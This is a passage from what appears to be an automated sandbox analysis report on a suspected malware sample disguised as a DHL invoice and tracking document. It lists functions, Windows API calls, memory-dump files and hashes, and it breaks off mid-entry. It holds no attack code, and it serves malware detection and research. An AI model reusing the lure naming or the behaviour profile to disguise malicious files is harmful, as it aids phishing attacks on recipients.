Function 012AAEBA Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 012AAEF9
GetKeyboardState.USER32(?), ref: 012AAF0E
SetKeyboardState.USER32(?), ref: 012AAF6F
PostMessageW.USER32 ref: 012AAF9D
PostMessageW.USER32 ref: 012AAFBC
PostMessageW.USER32 ref: 012AAFFD
PostMessageW.USER32 ref: 012AB020

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 6bbb6247d875100940629f5c97867def81a654dadcecc48b7ec699e7c90768a7
Instruction ID: 2636283b81f797e27a7076014144e4ff383db59ace4b1cc29b34161eb5b21c6c
Opcode Fuzzy Hash: 6bbb6247d875100940629f5c97867def81a654dadcecc48b7ec699e7c90768a7
Instruction Fuzzy Hash: 0351C5A0A647D63FFB374238CC45BBABEA95F06304F488589E3D9964C2C3D9A8D4D750

Function 012AACDA Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 012AAD19
GetKeyboardState.USER32(?), ref: 012AAD2E
SetKeyboardState.USER32(?), ref: 012AAD8F
PostMessageW.USER32 ref: 012AADBB
PostMessageW.USER32 ref: 012AADD8
PostMessageW.USER32 ref: 012AAE17
PostMessageW.USER32 ref: 012AAE38

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 610666613a27ca22b3eb9914105ba28cf3b7989918141466fddd381745de2f9e
Instruction ID: aaece428b3f49f7a4bb1190dee9cf141343b2ad2edc84b5c49ac06637806fa75
Opcode Fuzzy Hash: 610666613a27ca22b3eb9914105ba28cf3b7989918141466fddd381745de2f9e
Instruction Fuzzy Hash: AE51E6A19247D63FFB378238CC55B7ABEA96F46300F488499E3D5474C2D294E898D7A0

Function 0127542E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32 ref: 01275470
__fassign.LIBCMT ref: 012754EB
__fassign.LIBCMT ref: 01275506
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,01283CD6,00000005,00000000,00000000), ref: 0127552C
WriteFile.KERNEL32(?,01283CD6,00000000,01275BA3,00000000), ref: 0127554B
WriteFile.KERNEL32(?,?,00000001,01275BA3,00000000), ref: 01275584

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: c07652a4bd6d7f69db8a33da2bbf683596ca2309f322c26b367454b5a278ed17
Instruction ID: eef1b9c3932d4ddfee80f1a334c6c2cf99041fbc24fd7ef4ba68f74d398c1f46
Opcode Fuzzy Hash: c07652a4bd6d7f69db8a33da2bbf683596ca2309f322c26b367454b5a278ed17
Instruction Fuzzy Hash: FC51A171A1124A9FDB11CFA8E845AEEFBF9EF09300F14415EF655E7281D7309A51CB60

Function 01262D20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 01262D4B
___except_validate_context_record.LIBVCRUNTIME ref: 01262D53
_ValidateLocalCookies.LIBCMT ref: 01262DE1
__IsNonwritableInCurrentImage.LIBCMT ref: 01262E0C
_ValidateLocalCookies.LIBCMT ref: 01262E61

Strings

csm, xrefs: 01262DF6

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 0f66dafc102225cbe4d9be0bc5801461cf985537201bbda8ddccdd1e0182de72
Instruction ID: e6b4c96922dcaf3e61fb1a2b08438ae74dde39f450882b2d024da30154e0aee3
Opcode Fuzzy Hash: 0f66dafc102225cbe4d9be0bc5801461cf985537201bbda8ddccdd1e0182de72
Instruction Fuzzy Hash: CA41B334A2020AEBCF10DF68C844AEEBBB9BF55324F048155EA14AB3D1D771E981CBD0

Function 012C10B8 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON

Download Yara Rule

APIs

Part of subcall function 012C304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 012C307A
Part of subcall function 012C304E: _wcslen.LIBCMT ref: 012C309B

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 012C1112
WSAGetLastError.WSOCK32 ref: 012C1121
WSAGetLastError.WSOCK32 ref: 012C11C9
closesocket.WSOCK32(00000000), ref: 012C11F9

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
String ID:
API String ID: 2675159561-0
Opcode ID: e2735a7fa9f4602f503b57d9479a7f9cddc0aa4c36864305fcfc313ee73abed7
Instruction ID: fb51f574a99dadd381fd93d45d69b4b005505e6169f6c48f63bf24dd56da0b9a
Opcode Fuzzy Hash: e2735a7fa9f4602f503b57d9479a7f9cddc0aa4c36864305fcfc313ee73abed7
Instruction Fuzzy Hash: A2412631610205EFEB109F18D849BA9BBE9FF81724F04825DEE159B286C7B4ED51CBE0

Function 012ACF00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 012ADDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,012ACF22,?), ref: 012ADDFD

Part of subcall function 012ADDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,012ACF22,?), ref: 012ADE16

lstrcmpiW.KERNEL32(?,?), ref: 012ACF45
MoveFileW.KERNEL32 ref: 012ACF7F
_wcslen.LIBCMT ref: 012AD005
_wcslen.LIBCMT ref: 012AD01B
SHFileOperationW.SHELL32(?), ref: 012AD061

Strings

\*.*, xrefs: 012ACFF3

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
String ID: \*.*
API String ID: 3164238972-1173974218
Opcode ID: 6f04087fbbfe8a88391927fe2920d44379dd117fb7e2902bdb497d2a1f599a05
Instruction ID: f57cdae3fe97fd21109a9d4cc1c4003b613c4511594360c14ea978c1692ebff1
Opcode Fuzzy Hash: 6f04087fbbfe8a88391927fe2920d44379dd117fb7e2902bdb497d2a1f599a05
Instruction Fuzzy Hash: F04174B185521E9FDF12EBA4D981AEEB7BCAF18380F4000E6D605EB141EE34A794CB50

Function 012D2DFD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 012D2E1C
GetWindowLongW.USER32(00000000,000000F0), ref: 012D2E4F
GetWindowLongW.USER32(00000000,000000F0), ref: 012D2E84
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 012D2EB6
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 012D2EE0
GetWindowLongW.USER32(00000000,000000F0), ref: 012D2EF1
SetWindowLongW.USER32 ref: 012D2F0B

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: f5830cdf5953c2a9af2d42d0f62b54586b53d7ab3ebe9a8fc9807b5da35e237e
Instruction ID: a47d76c247f7b2f4a7f5fc34dd5273c0ee51aab2ad2c19e83c9a26673eb37dc0
Opcode Fuzzy Hash: f5830cdf5953c2a9af2d42d0f62b54586b53d7ab3ebe9a8fc9807b5da35e237e
Instruction Fuzzy Hash: CB310530A55151DFEB21CF58EC88FA537E5EB8A711F1501A4FA109B2A6CB71B850DB81

Function 012A7726 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 012A7769
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 012A778F
SysAllocString.OLEAUT32(00000000), ref: 012A7792
SysAllocString.OLEAUT32(?), ref: 012A77B0
SysFreeString.OLEAUT32(?), ref: 012A77B9
StringFromGUID2.OLE32(?,?,00000028), ref: 012A77DE
SysAllocString.OLEAUT32(?), ref: 012A77EC

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: f14096b9d8a105d1787ce1ffa2e36b6815904c529f7ecc5821f411f2707cb5fa
Instruction ID: 213aa489ffd72d43e27f3fce38a85575cf36dc99950f163ad7791ed896c020f8
Opcode Fuzzy Hash: f14096b9d8a105d1787ce1ffa2e36b6815904c529f7ecc5821f411f2707cb5fa
Instruction Fuzzy Hash: 9A21C176A1521AAFDF14EFACDC88CBB7BACEB09764740812AFA04DB140D670DC41CB64

Function 012A77FD Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 012A7842
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 012A7868
SysAllocString.OLEAUT32(00000000), ref: 012A786B
SysAllocString.OLEAUT32 ref: 012A788C
SysFreeString.OLEAUT32 ref: 012A7895
StringFromGUID2.OLE32(?,?,00000028), ref: 012A78AF
SysAllocString.OLEAUT32(?), ref: 012A78BD

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 07933419400420e073ad3954a95596e0c05a5495561b937b2a0a31b67e31e104
Instruction ID: 787d5772230582f18030a5a58b78bdb4ab69064ce25627c86adb8db346070873
Opcode Fuzzy Hash: 07933419400420e073ad3954a95596e0c05a5495561b937b2a0a31b67e31e104
Instruction Fuzzy Hash: 9E21AF31A15205AFDB20AFBCDC88DBA77ECEF097607408129FA15CB295DA74DC41DB68

Function 012B05A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 012B05C6
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 012B0601

Strings

nul, xrefs: 012B0639

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: 9700531d04a005d715b6c0d476cd75f8f6d0da53fb580a59147bd591d01d8074
Instruction ID: 03187dab551e622dbd91995198d45a75645d1679a2265d6c8cf3ad7129586b6d
Opcode Fuzzy Hash: 9700531d04a005d715b6c0d476cd75f8f6d0da53fb580a59147bd591d01d8074
Instruction Fuzzy Hash: BB2180759102069FEB229F6DD888ADB7BB4BF85760F200A19FAA1D72D4D6B09450CB14

Function 012B04D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 012B04F2
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 012B052E

Strings

nul, xrefs: 012B0567

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: 7759e858e7712c5af5c0e44d24d0aa3ecafbef95a6a3671c08938502fb216386
Instruction ID: 535f5253e66e057d1a17beefe30c45a5b4784b74f48ae9c98bdaec3ee6687edd
Opcode Fuzzy Hash: 7759e858e7712c5af5c0e44d24d0aa3ecafbef95a6a3671c08938502fb216386
Instruction Fuzzy Hash: C221A2B09103069FDB219F29E888ADB7BB4BF447A4F104A18FAA1D62D0D7709950CB24

Function 012D40AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0124600E: CreateWindowExW.USER32 ref: 0124604C
Part of subcall function 0124600E: GetStockObject.GDI32(00000011), ref: 01246060
Part of subcall function 0124600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0124606A

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 012D4112
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 012D411F
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 012D412A
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 012D4139
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 012D4145

Strings

Msctls_Progress32, xrefs: 012D40E3

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: a064b28d3236e49d36c305d885508b17405145f082d3002d5727a010a0a5c0e8
Instruction ID: 7044793b6ad66e4223b8112f7590bd7132676aaf6b8c9e78bc575b077a4f7127
Opcode Fuzzy Hash: a064b28d3236e49d36c305d885508b17405145f082d3002d5727a010a0a5c0e8
Instruction Fuzzy Hash: 0A1182B215021ABEEF219E64CC85EE77FADEF09798F014111FB18A6190C672DC21DBA4

Function 0127D7DF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0127D7A3: _free.LIBCMT ref: 0127D7CC

_free.LIBCMT ref: 0127D82D

Part of subcall function 012729C8: HeapFree.KERNEL32(00000000,00000000), ref: 012729DE
Part of subcall function 012729C8: GetLastError.KERNEL32(00000000,?,0127D7D1,00000000,00000000,00000000,00000000,?,0127D7F8,00000000,00000007,00000000,?,0127DBF5,00000000,00000000), ref: 012729F0

_free.LIBCMT ref: 0127D838
_free.LIBCMT ref: 0127D843
_free.LIBCMT ref: 0127D897
_free.LIBCMT ref: 0127D8A2
_free.LIBCMT ref: 0127D8AD
_free.LIBCMT ref: 0127D8B8

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 2933ec371357d85e0939af21d8d0365b0e51011a77ef7c4dc3c45f1a05a36567
Instruction ID: 7d69199ff12acd8ae03ba74cd82f02480bf269215bb0bc93b505764dfd287d5f
Opcode Fuzzy Hash: 2933ec371357d85e0939af21d8d0365b0e51011a77ef7c4dc3c45f1a05a36567
Instruction Fuzzy Hash: B1119D71962B49FADA21BFF4CC05FEBFBDCAF60700F440825E299A6090DE34B5458760

Function 012ADA5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 012ADA74
LoadStringW.USER32(00000000), ref: 012ADA7B
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 012ADA91
LoadStringW.USER32(00000000), ref: 012ADA98
MessageBoxW.USER32 ref: 012ADADC

Strings

%s (%d) : ==> %s: %s %s, xrefs: 012ADAB9

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: HandleLoadModuleString$Message
String ID: %s (%d) : ==> %s: %s %s
API String ID: 4072794657-3128320259
Opcode ID: a6fa3093d070bf2bbd0b0fe36d6bef48299741003e40dcc7e9af740bfe857267
Instruction ID: 088e27bfeaec6ec825ec4b0451f3e5b8230be99c484b7adfcfc23c4b2ce373dc
Opcode Fuzzy Hash: a6fa3093d070bf2bbd0b0fe36d6bef48299741003e40dcc7e9af740bfe857267
Instruction Fuzzy Hash: 460162F29002187FE7219BE4DD8DEEB366CE708305F400999B746E2045EA749E948F74

Function 012B096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(00A3A368,00A3A368), ref: 012B097B
EnterCriticalSection.KERNEL32(00A3A348,00000000), ref: 012B098D
TerminateThread.KERNEL32(00000000,000001F6), ref: 012B099B
WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 012B09A9
CloseHandle.KERNEL32(00000000), ref: 012B09B8
InterlockedExchange.KERNEL32(00A3A368,000001F6), ref: 012B09C8
LeaveCriticalSection.KERNEL32(00A3A348), ref: 012B09CF

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 0237af2b8807b515f13d9eaa17ec5d689f5f8761051b69658c4df7bec528694a
Instruction ID: 6dc39e8454f61651d8fdc366a1748b2c4c50a475941d06188b766963dfc792aa
Opcode Fuzzy Hash: 0237af2b8807b515f13d9eaa17ec5d689f5f8761051b69658c4df7bec528694a
Instruction Fuzzy Hash: 83F01D31883912ABE7626BA4EE8CBD67A35BF01742F401129F20190894C774A475CF94

Function 012C1C60 Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 012C1DC0
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 012C1DE1
WSAGetLastError.WSOCK32 ref: 012C1DF2
htons.WSOCK32(?,?,?,?,?), ref: 012C1EDB
inet_ntoa.WSOCK32(?), ref: 012C1E8C

Part of subcall function 012A39E8: _strlen.LIBCMT ref: 012A39F2

Part of subcall function 012C3224: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,012BEC0C), ref: 012C3240

_strlen.LIBCMT ref: 012C1F35

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
String ID:
API String ID: 3203458085-0
Opcode ID: 4e59df3f90f1f617d3f192981d2a9a016ab89a4267916b40eab5668faacc3f3d
Instruction ID: 19d7ad5e8e17c6f0a11f35199262262440bf80c4e4ffac67fa9b579303873970
Opcode Fuzzy Hash: 4e59df3f90f1f617d3f192981d2a9a016ab89a4267916b40eab5668faacc3f3d
Instruction Fuzzy Hash: 53B1C030214342EFD324DF28C885E3A7BE5AF94B18F54864CF6565B2A2CB71ED52CB91

Function 01245D0A Relevance: 9.3, APIs: 6, Instructions: 276COMMON

Download Yara Rule

APIs

GetClientRect.USER32 ref: 01245D30
